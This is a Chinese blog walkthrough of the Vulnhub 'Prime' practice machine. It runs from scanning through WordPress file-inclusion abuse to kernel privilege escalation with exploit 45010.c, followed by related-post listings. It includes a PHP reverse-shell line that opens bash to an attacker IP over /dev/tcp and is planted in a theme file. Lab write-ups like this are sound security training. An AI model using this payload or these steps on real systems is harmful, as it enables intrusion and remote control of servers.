【学渗透靶机——prime】

已于 2023-06-21 13:57:52 修改
阅读量344 收藏
点赞数
分类专栏: 靶机学习 文章标签: 安全
于 2023-05-13 16:30:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jieli0901227/article/details/130654402
版权

渗透靶机——prime

环境

攻击机:kali
靶机:prime

信息收集:

主机信息收集

主机ip收集:

nmap -sn  192.168.241.0/24

主机端口信息收集:

root@kali:~# nmap --min-rate 10000 -p- 192.168.241.151

在这里插入图片描述

主机开放端口服务版本

root@kali:~# nmap -sT -sV -sC -p22,80  192.168.241.151

在这里插入图片描述

nmap简单漏洞探测信息收集

root@kali:~# nmap --script=vuln -p22,80  192.168.241.151

在这里插入图片描述
主机信息总结
这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上

web信息收集

访问80浏览器显示如下:

在这里插入图片描述
查看源代码
在这里插入图片描述
也没发现什么有用的信息

查看namp 漏洞枚举的web

浏览器访问页面如下所示,发现是wordpress CMS, wordprees 后台登录页面
在这里插入图片描述
在这里插入图片描述
我们使用wpscan 扫描 进行后台账号枚举
在这里插入图片描述
发现这个有个账号 victor ,尝试目录爆破失败

目录扫描

gobuster dir -u http://192.168.241.151 -x txt,php,zip,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

访问查看发现
在这里插入图片描述
翻译过来大概是

**1)对于php文件做更多的fuzz,找到正确的参数
parameter
2)可以使用fuzz工具,比如git的:Fuzz_For_
Web
3)如果还是卡在这一步,去学学OSCP(
Offensive Security Certified Professional)——
以Kali Linux 实际操作为主要内容的考试
4)如果找到location.txt的位置,就知道下一步
怎么做(先记住它,后面会用到)

wfuzz 模糊测试

通过模糊测试index.php 的参数,结果如下图:
在这里插入图片描述
得到http://192.168.184.160/index.php?file=filename(可能是文件包含 下载漏洞)

尝试文件包含漏洞
在这里插入图片描述
页面提示我挖错文件了,,那就尝试读取location.txt.,如下图
在这里插入图片描述

文件包含利用

提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞

通过测试只有image.php存在文件包含漏洞,并且在saket 的家目录有个passwod,txt
在这里插入图片描述
利用文件包含读取password.txt
在这里插入图片描述
获得一个密码
开放了22端口:尝试ssh 登录,失败
在这里插入图片描述
尝试wordpress 的后台登录,通过victor 成功登录
在这里插入图片描述
接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.140/443 0>&1'");  ?>

在这里插入图片描述
保存后,访问这个secret.php 这个页面就可以触发,连接到攻击机,
那个这个页面的路径查找方法:

1、互联网搜索
2、wpscan 扫描
3、目录爆破
4、重新部署wordpress

这里我使用wpscan
在这里插入图片描述
靶机设置监听
在这里插入图片描述

获取系统初始shell

1、查看身份

whoami

在这里插入图片描述

2、查看系统可执行超级权限

sudo -l

在这里插入图片描述
查看enc 文件 无读权限
在这里插入图片描述

3、查看计划任务
在这里插入图片描述
有一个执行脚本,但是没有权限,不做考虑
4、查看系统版本
在这里插入图片描述

提权

使用searchsploit 搜索版本内核是否有漏洞
在这里插入图片描述
下载45010.c 上传靶机内核提权
在这里插入图片描述

Vulnhub: Prime (2021): 2靶机
qq_43884092的博客
07-22 190
wordpress插件gracemedia-media-player文件包含,samba上传公钥拿shell,CVE-2021-4034、lxd提权
CFS三层靶机——内网渗透流程
最新发布
2301_81177363的博客
05-05 950
靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet2和NAT网卡、Target2搭载VMnet2和VMnet3网卡、Target3仅搭载VMnet3网卡。(确保两两之间能互相通信)
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 2061
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
靶机-primel
qq_45751902的博客
10-18 1918
靶机primel系统:ubuntu没有密码,没有ip,nat模式攻击机:kali目标:获得root的flag。
Vulnhub靶机PRIME_ 1
LainWith的博客
12-10 673
Prime(此系列共1台)发布日期:2019年9月1日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描目录爆破文件扩展名爆破强制访问文件包含漏洞WordPress利用内核提权。
渗透测试怎么搭建靶机_渗透测试实战——prime靶机入侵
weixin_39857876的博客
11-21 422
原创:safe6合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQIp:192.168.0.115Kali:192.168.0.21安装好的靶机界面​Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以...
wpscan渗透wordpress靶机——dc6
网络设备配置-华为
09-22 1318
wordpress: wpscan: 实验环境:kali linux和靶机环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip 下载后,直接在vm打开即可。 注意要使kali和靶机同处一个网段之中,我这里都在VM中搭建NAT模式。 信息收集 靶机打后是这样的: 这个时候出于需求目的,我们需要探测目标主机的ip、操作系统和版本以及其他服务的版本号。kali中集成了很多信息收集的工具,我这里仅用最常使用的 NMAP。 一、勘测目标主机ip地址和开放端口及服
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让习者通过查找和利用...
内网渗透——红日靶机习(一)
jammny
11-13 6496
前言 开启内网习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
一次零基础靶机渗透细节全程记录——Tr0ll
ran的博客
07-12 4287
渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
Prime靶场
wcl20010的博客
05-02 521
prime靶场(vulnhub) 靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
Vulnhub靶机 Prime_Series_Level-1
菜浪马废的博客
04-29 908
换一个参数 secrettier360 返回结果太多 过滤一下 ??? 觉得自己被耍了 这不是saket的密码 我吐了 是victor的 我*****他的 连接成功 以为突破口是env 最后还是内核提权 我用的最后一个漏洞 先在kali上编译 gcc -o poc 45010.c 然后传到靶机上 直接运行 Vulnhub就打到这吧 主要是还要下载 太麻烦了...
prime靶机CVE-2017-16695复现
weixin_51625802的博客
04-18 2372
prime靶机cve-45010复现 前期准备 使用nmap -sP 192.168.136.1/24 找出这台靶机的ip:192.168.136.128 本机ip:192.168.136.129 扫描目录 dirb 192.168.136.128 记住扫到的这个网站先留个伏笔 dirb 192.168.136.128 -X .php,.txt,.zip 扫出俩php网站和一个提示网站 http://192.168.136.128/image.php (C
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 2038
Vulnhub靶场Prime_Series_Level-1渗透
靶机渗透Prime1
qi_qi14的博客
07-13 291
找到目标靶机ip地址为192.168.133.140 发现有两个开放端口 分别为22端口和80端口 端口UDP扫描 漏洞脚本扫描 访问靶机80端口 访问得到 sudo curl http://192.168.133.140/secret.txt Looks like you have got some secrets.Ok I just want to do some help to you.Do some more fuzz on every page of php which was finde
红队靶场之prime1靶机复现思路,wordpress反弹shell,shell执行ubuntu内核提权
m0_58116751的博客
05-18 1868
OK,我们看到目录扫描完毕,我们大致扫一眼就能看到里面最敏感的我认为就是/wordpress/w-admin 我们在做渗透测试的时候需要有一定的嗅觉,结合我们之前在nmap脚本扫描中确实看到了wordpress的个平台那么这个目录90%就是他的登录界面了然后还有几个可疑目录。我们猜想是正确的,我们简单尝试几个弱口令,都失败了进不去,那没有办法,我们暂且将他搁置,我们去看下背的目录,看能不能找到一些别的信息。我们去image看下。我们看到他的默认页面是kali的图片,看一眼源码也没有发现什么可以利用的东西。
prime1靶场渗透
weixin_73562787的博客
07-18 402
靶场练习,详细全过程,prime1.0靶场
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1431
vulnhub ai-web1.0
prime 1 靶场渗透测试
Jianmuhtb的博客
07-27 1433
靶机prime1 下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar攻击机:kali Linux2023.2环境:VMware网络:两机均为nat。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值